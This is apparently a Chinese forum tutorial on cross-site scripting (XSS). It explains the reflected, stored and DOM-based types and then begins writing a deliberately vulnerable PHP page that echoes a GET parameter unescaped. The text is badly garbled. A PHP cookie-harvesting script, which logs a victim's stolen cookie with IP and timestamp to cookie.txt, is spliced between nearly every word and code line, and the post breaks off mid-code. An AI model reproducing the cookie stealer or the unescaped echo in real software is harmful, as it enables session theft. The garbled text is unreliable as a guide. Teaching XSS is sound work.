ToB企服应用市场:ToB评测及商务社交产业平台

标题: xss实战 [打印本页]
作者: 嚴華    时间: 2022-10-25 23:24
标题: xss实战
一、xss漏洞原理

1.什么是xss漏洞?

跨站点脚本(也称为<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> XSS)是一种<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> Web<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 安全漏洞,允许攻击者破坏用户与易受攻击的应用程序的交互。它允许攻击者绕过同源策略,该策略旨在将不同的网站相互隔离。跨站点脚本漏洞通常允许攻击者伪装成受害者用户,执行用户能够执行的任何操作,并访问用户的任何数据。如果受害者用户在应用程序中具有特权访问权限,那么攻击者可能能够完全控制应用程序的所有功能和数据。
2.xss分类

1)反射型xss

是最简单的跨站点脚本。当应用程序接收到<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> HTTP<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 请求中的数据并以不安全的方式将该数据包含在即时响应中时,就会出现这种情况。
如果用户访问攻击者构建的<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> URL,则攻击者的脚本会在用户的浏览器中执行,在该用户与应用程序的会话上下文中。此时,脚本可以执行任何操作,并检索用户有权访问的任何数据。

2)存储型xss

当应用程序从不受信任的来源接收数据并以不安全的方式将该数据包含在其以后的<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> HTTP<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 响应中时,就会出现存储的跨站点脚本
反射型<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> XSS<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 和存储型<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> XSS<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 的区别
反射型<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> XSS<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 和存储型<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> XSS<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 之间的主要区别在于,存储型<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> XSS<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 漏洞会导致在应用程序本身内自包含的攻击。攻击者不需要寻找外部方法来诱导其他用户发出包含其漏洞利用的特定请求。相反,攻击者将他们的漏洞利用放入应用程序本身,并等待用户遇到它。

3)DOM型xss

基于<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> DOM<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 的<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> XSS<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 漏洞通常出现在<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> JavaScript<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 从攻击者可控制的来源(例如<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> URL)获取数据并将其传递到支持动态代码执行的接收器(例如eval()或innerHTML.<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 这使攻击者能够执行恶意<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> JavaScript,这通常允许他们劫持其他用户的帐户。
要进行基于<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> DOM<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 的<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> XSS<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 攻击,您需要将数据放入源中,以便将其传播到接收器并导致执行任意<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> JavaScript。
DOM<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> XSS<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 最常见的来源是<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> URL,通常通过window.location对象访问。攻击者可以构建一个链接,将受害者发送到易受攻击的页面,其中包含查询字符串中的有效负载和<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> URL<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 的片段部分。在某些情况下,例如针对<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 404<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 页面或运行<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> PHP<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 的网站时,有效负载也可以放置在路径中。

二、xss漏洞实战

1.编写一个存在xss的页面
  1. <!DOCTYPE<?php
  2. $cookie = $_GET['cookie'];
  3. $ip = getenv ('REMOTE_ADDR');
  4. $time = date('Y-m-d g:i:s');
  5. $fp = fopen("cookie.txt","a");
  6. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  7. fclose($fp);
  8. ?> html><html>
  9. <?php
  10. $cookie = $_GET['cookie'];
  11. $ip = getenv ('REMOTE_ADDR');
  12. $time = date('Y-m-d g:i:s');
  13. $fp = fopen("cookie.txt","a");
  14. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  15. fclose($fp);
  16. ?> <?php
  17. $cookie = $_GET['cookie'];
  18. $ip = getenv ('REMOTE_ADDR');
  19. $time = date('Y-m-d g:i:s');
  20. $fp = fopen("cookie.txt","a");
  21. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  22. fclose($fp);
  23. ?> <head>
  24. <?php
  25. $cookie = $_GET['cookie'];
  26. $ip = getenv ('REMOTE_ADDR');
  27. $time = date('Y-m-d g:i:s');
  28. $fp = fopen("cookie.txt","a");
  29. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  30. fclose($fp);
  31. ?> <?php
  32. $cookie = $_GET['cookie'];
  33. $ip = getenv ('REMOTE_ADDR');
  34. $time = date('Y-m-d g:i:s');
  35. $fp = fopen("cookie.txt","a");
  36. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  37. fclose($fp);
  38. ?> <?php
  39. $cookie = $_GET['cookie'];
  40. $ip = getenv ('REMOTE_ADDR');
  41. $time = date('Y-m-d g:i:s');
  42. $fp = fopen("cookie.txt","a");
  43. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  44. fclose($fp);
  45. ?> <?php
  46. $cookie = $_GET['cookie'];
  47. $ip = getenv ('REMOTE_ADDR');
  48. $time = date('Y-m-d g:i:s');
  49. $fp = fopen("cookie.txt","a");
  50. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  51. fclose($fp);
  52. ?> <meta<?php
  53. $cookie = $_GET['cookie'];
  54. $ip = getenv ('REMOTE_ADDR');
  55. $time = date('Y-m-d g:i:s');
  56. $fp = fopen("cookie.txt","a");
  57. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  58. fclose($fp);
  59. ?> http-equiv="content-type"<?php
  60. $cookie = $_GET['cookie'];
  61. $ip = getenv ('REMOTE_ADDR');
  62. $time = date('Y-m-d g:i:s');
  63. $fp = fopen("cookie.txt","a");
  64. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  65. fclose($fp);
  66. ?> content="text/html;charset=utf-8">
  67. <?php
  68. $cookie = $_GET['cookie'];
  69. $ip = getenv ('REMOTE_ADDR');
  70. $time = date('Y-m-d g:i:s');
  71. $fp = fopen("cookie.txt","a");
  72. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  73. fclose($fp);
  74. ?> <?php
  75. $cookie = $_GET['cookie'];
  76. $ip = getenv ('REMOTE_ADDR');
  77. $time = date('Y-m-d g:i:s');
  78. $fp = fopen("cookie.txt","a");
  79. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  80. fclose($fp);
  81. ?> <?php
  82. $cookie = $_GET['cookie'];
  83. $ip = getenv ('REMOTE_ADDR');
  84. $time = date('Y-m-d g:i:s');
  85. $fp = fopen("cookie.txt","a");
  86. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  87. fclose($fp);
  88. ?> <?php
  89. $cookie = $_GET['cookie'];
  90. $ip = getenv ('REMOTE_ADDR');
  91. $time = date('Y-m-d g:i:s');
  92. $fp = fopen("cookie.txt","a");
  93. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  94. fclose($fp);
  95. ?>
  96. <?php
  97. $cookie = $_GET['cookie'];
  98. $ip = getenv ('REMOTE_ADDR');
  99. $time = date('Y-m-d g:i:s');
  100. $fp = fopen("cookie.txt","a");
  101. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  102. fclose($fp);
  103. ?> <?php
  104. $cookie = $_GET['cookie'];
  105. $ip = getenv ('REMOTE_ADDR');
  106. $time = date('Y-m-d g:i:s');
  107. $fp = fopen("cookie.txt","a");
  108. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  109. fclose($fp);
  110. ?> <?php
  111. $cookie = $_GET['cookie'];
  112. $ip = getenv ('REMOTE_ADDR');
  113. $time = date('Y-m-d g:i:s');
  114. $fp = fopen("cookie.txt","a");
  115. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  116. fclose($fp);
  117. ?> <?php
  118. $cookie = $_GET['cookie'];
  119. $ip = getenv ('REMOTE_ADDR');
  120. $time = date('Y-m-d g:i:s');
  121. $fp = fopen("cookie.txt","a");
  122. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  123. fclose($fp);
  124. ?> <title>欢迎来到level1</title>
  125. <?php
  126. $cookie = $_GET['cookie'];
  127. $ip = getenv ('REMOTE_ADDR');
  128. $time = date('Y-m-d g:i:s');
  129. $fp = fopen("cookie.txt","a");
  130. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  131. fclose($fp);
  132. ?> <?php
  133. $cookie = $_GET['cookie'];
  134. $ip = getenv ('REMOTE_ADDR');
  135. $time = date('Y-m-d g:i:s');
  136. $fp = fopen("cookie.txt","a");
  137. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  138. fclose($fp);
  139. ?> </head>
  140. <?php
  141. $cookie = $_GET['cookie'];
  142. $ip = getenv ('REMOTE_ADDR');
  143. $time = date('Y-m-d g:i:s');
  144. $fp = fopen("cookie.txt","a");
  145. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  146. fclose($fp);
  147. ?> <?php
  148. $cookie = $_GET['cookie'];
  149. $ip = getenv ('REMOTE_ADDR');
  150. $time = date('Y-m-d g:i:s');
  151. $fp = fopen("cookie.txt","a");
  152. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  153. fclose($fp);
  154. ?> <body>
  155. <?php
  156. $cookie = $_GET['cookie'];
  157. $ip = getenv ('REMOTE_ADDR');
  158. $time = date('Y-m-d g:i:s');
  159. $fp = fopen("cookie.txt","a");
  160. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  161. fclose($fp);
  162. ?> <?php
  163. $cookie = $_GET['cookie'];
  164. $ip = getenv ('REMOTE_ADDR');
  165. $time = date('Y-m-d g:i:s');
  166. $fp = fopen("cookie.txt","a");
  167. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  168. fclose($fp);
  169. ?> <?php
  170. $cookie = $_GET['cookie'];
  171. $ip = getenv ('REMOTE_ADDR');
  172. $time = date('Y-m-d g:i:s');
  173. $fp = fopen("cookie.txt","a");
  174. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  175. fclose($fp);
  176. ?> <?php
  177. $cookie = $_GET['cookie'];
  178. $ip = getenv ('REMOTE_ADDR');
  179. $time = date('Y-m-d g:i:s');
  180. $fp = fopen("cookie.txt","a");
  181. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  182. fclose($fp);
  183. ?> <h1<?php
  184. $cookie = $_GET['cookie'];
  185. $ip = getenv ('REMOTE_ADDR');
  186. $time = date('Y-m-d g:i:s');
  187. $fp = fopen("cookie.txt","a");
  188. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  189. fclose($fp);
  190. ?> align=center>欢迎来到level1</h1>
  191. <?php
  192. $cookie = $_GET['cookie'];
  193. $ip = getenv ('REMOTE_ADDR');
  194. $time = date('Y-m-d g:i:s');
  195. $fp = fopen("cookie.txt","a");
  196. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  197. fclose($fp);
  198. ?> <?php
  199. $cookie = $_GET['cookie'];
  200. $ip = getenv ('REMOTE_ADDR');
  201. $time = date('Y-m-d g:i:s');
  202. $fp = fopen("cookie.txt","a");
  203. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  204. fclose($fp);
  205. ?> <?php
  206. $cookie = $_GET['cookie'];
  207. $ip = getenv ('REMOTE_ADDR');
  208. $time = date('Y-m-d g:i:s');
  209. $fp = fopen("cookie.txt","a");
  210. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  211. fclose($fp);
  212. ?> <?php
  213. $cookie = $_GET['cookie'];
  214. $ip = getenv ('REMOTE_ADDR');
  215. $time = date('Y-m-d g:i:s');
  216. $fp = fopen("cookie.txt","a");
  217. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  218. fclose($fp);
  219. ?> <?php<?php
  220. $cookie = $_GET['cookie'];
  221. $ip = getenv ('REMOTE_ADDR');
  222. $time = date('Y-m-d g:i:s');
  223. $fp = fopen("cookie.txt","a");
  224. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  225. fclose($fp);
  226. ?>
  227. <?php
  228. $cookie = $_GET['cookie'];
  229. $ip = getenv ('REMOTE_ADDR');
  230. $time = date('Y-m-d g:i:s');
  231. $fp = fopen("cookie.txt","a");
  232. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  233. fclose($fp);
  234. ?> <?php
  235. $cookie = $_GET['cookie'];
  236. $ip = getenv ('REMOTE_ADDR');
  237. $time = date('Y-m-d g:i:s');
  238. $fp = fopen("cookie.txt","a");
  239. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  240. fclose($fp);
  241. ?> <?php
  242. $cookie = $_GET['cookie'];
  243. $ip = getenv ('REMOTE_ADDR');
  244. $time = date('Y-m-d g:i:s');
  245. $fp = fopen("cookie.txt","a");
  246. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  247. fclose($fp);
  248. ?> <?php
  249. $cookie = $_GET['cookie'];
  250. $ip = getenv ('REMOTE_ADDR');
  251. $time = date('Y-m-d g:i:s');
  252. $fp = fopen("cookie.txt","a");
  253. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  254. fclose($fp);
  255. ?> ini_set("display_errors",<?php
  256. $cookie = $_GET['cookie'];
  257. $ip = getenv ('REMOTE_ADDR');
  258. $time = date('Y-m-d g:i:s');
  259. $fp = fopen("cookie.txt","a");
  260. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  261. fclose($fp);
  262. ?> 0);<?php
  263. $cookie = $_GET['cookie'];
  264. $ip = getenv ('REMOTE_ADDR');
  265. $time = date('Y-m-d g:i:s');
  266. $fp = fopen("cookie.txt","a");
  267. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  268. fclose($fp);
  269. ?> <?php
  270. $cookie = $_GET['cookie'];
  271. $ip = getenv ('REMOTE_ADDR');
  272. $time = date('Y-m-d g:i:s');
  273. $fp = fopen("cookie.txt","a");
  274. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  275. fclose($fp);
  276. ?> <?php
  277. $cookie = $_GET['cookie'];
  278. $ip = getenv ('REMOTE_ADDR');
  279. $time = date('Y-m-d g:i:s');
  280. $fp = fopen("cookie.txt","a");
  281. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  282. fclose($fp);
  283. ?> //不显示错误报告
  284. <?php
  285. $cookie = $_GET['cookie'];
  286. $ip = getenv ('REMOTE_ADDR');
  287. $time = date('Y-m-d g:i:s');
  288. $fp = fopen("cookie.txt","a");
  289. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  290. fclose($fp);
  291. ?> <?php
  292. $cookie = $_GET['cookie'];
  293. $ip = getenv ('REMOTE_ADDR');
  294. $time = date('Y-m-d g:i:s');
  295. $fp = fopen("cookie.txt","a");
  296. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  297. fclose($fp);
  298. ?> <?php
  299. $cookie = $_GET['cookie'];
  300. $ip = getenv ('REMOTE_ADDR');
  301. $time = date('Y-m-d g:i:s');
  302. $fp = fopen("cookie.txt","a");
  303. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  304. fclose($fp);
  305. ?> <?php
  306. $cookie = $_GET['cookie'];
  307. $ip = getenv ('REMOTE_ADDR');
  308. $time = date('Y-m-d g:i:s');
  309. $fp = fopen("cookie.txt","a");
  310. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  311. fclose($fp);
  312. ?> $str<?php
  313. $cookie = $_GET['cookie'];
  314. $ip = getenv ('REMOTE_ADDR');
  315. $time = date('Y-m-d g:i:s');
  316. $fp = fopen("cookie.txt","a");
  317. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  318. fclose($fp);
  319. ?> =<?php
  320. $cookie = $_GET['cookie'];
  321. $ip = getenv ('REMOTE_ADDR');
  322. $time = date('Y-m-d g:i:s');
  323. $fp = fopen("cookie.txt","a");
  324. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  325. fclose($fp);
  326. ?> $_GET["name"];<?php
  327. $cookie = $_GET['cookie'];
  328. $ip = getenv ('REMOTE_ADDR');
  329. $time = date('Y-m-d g:i:s');
  330. $fp = fopen("cookie.txt","a");
  331. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  332. fclose($fp);
  333. ?>                         //获取参数传入
  334. <?php
  335. $cookie = $_GET['cookie'];
  336. $ip = getenv ('REMOTE_ADDR');
  337. $time = date('Y-m-d g:i:s');
  338. $fp = fopen("cookie.txt","a");
  339. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  340. fclose($fp);
  341. ?> <?php
  342. $cookie = $_GET['cookie'];
  343. $ip = getenv ('REMOTE_ADDR');
  344. $time = date('Y-m-d g:i:s');
  345. $fp = fopen("cookie.txt","a");
  346. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  347. fclose($fp);
  348. ?> <?php
  349. $cookie = $_GET['cookie'];
  350. $ip = getenv ('REMOTE_ADDR');
  351. $time = date('Y-m-d g:i:s');
  352. $fp = fopen("cookie.txt","a");
  353. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  354. fclose($fp);
  355. ?> <?php
  356. $cookie = $_GET['cookie'];
  357. $ip = getenv ('REMOTE_ADDR');
  358. $time = date('Y-m-d g:i:s');
  359. $fp = fopen("cookie.txt","a");
  360. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  361. fclose($fp);
  362. ?> echo<?php
  363. $cookie = $_GET['cookie'];
  364. $ip = getenv ('REMOTE_ADDR');
  365. $time = date('Y-m-d g:i:s');
  366. $fp = fopen("cookie.txt","a");
  367. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  368. fclose($fp);
  369. ?> "<h2<?php
  370. $cookie = $_GET['cookie'];
  371. $ip = getenv ('REMOTE_ADDR');
  372. $time = date('Y-m-d g:i:s');
  373. $fp = fopen("cookie.txt","a");
  374. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  375. fclose($fp);
  376. ?> align=center>欢迎用户".$str."</h2>";<?php
  377. $cookie = $_GET['cookie'];
  378. $ip = getenv ('REMOTE_ADDR');
  379. $time = date('Y-m-d g:i:s');
  380. $fp = fopen("cookie.txt","a");
  381. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  382. fclose($fp);
  383. ?> <?php
  384. $cookie = $_GET['cookie'];
  385. $ip = getenv ('REMOTE_ADDR');
  386. $time = date('Y-m-d g:i:s');
  387. $fp = fopen("cookie.txt","a");
  388. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  389. fclose($fp);
  390. ?> //用户输入什么就输出什么
  391. <?php
  392. $cookie = $_GET['cookie'];
  393. $ip = getenv ('REMOTE_ADDR');
  394. $time = date('Y-m-d g:i:s');
  395. $fp = fopen("cookie.txt","a");
  396. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  397. fclose($fp);
  398. ?> <?php
  399. $cookie = $_GET['cookie'];
  400. $ip = getenv ('REMOTE_ADDR');
  401. $time = date('Y-m-d g:i:s');
  402. $fp = fopen("cookie.txt","a");
  403. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  404. fclose($fp);
  405. ?> <?php
  406. $cookie = $_GET['cookie'];
  407. $ip = getenv ('REMOTE_ADDR');
  408. $time = date('Y-m-d g:i:s');
  409. $fp = fopen("cookie.txt","a");
  410. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
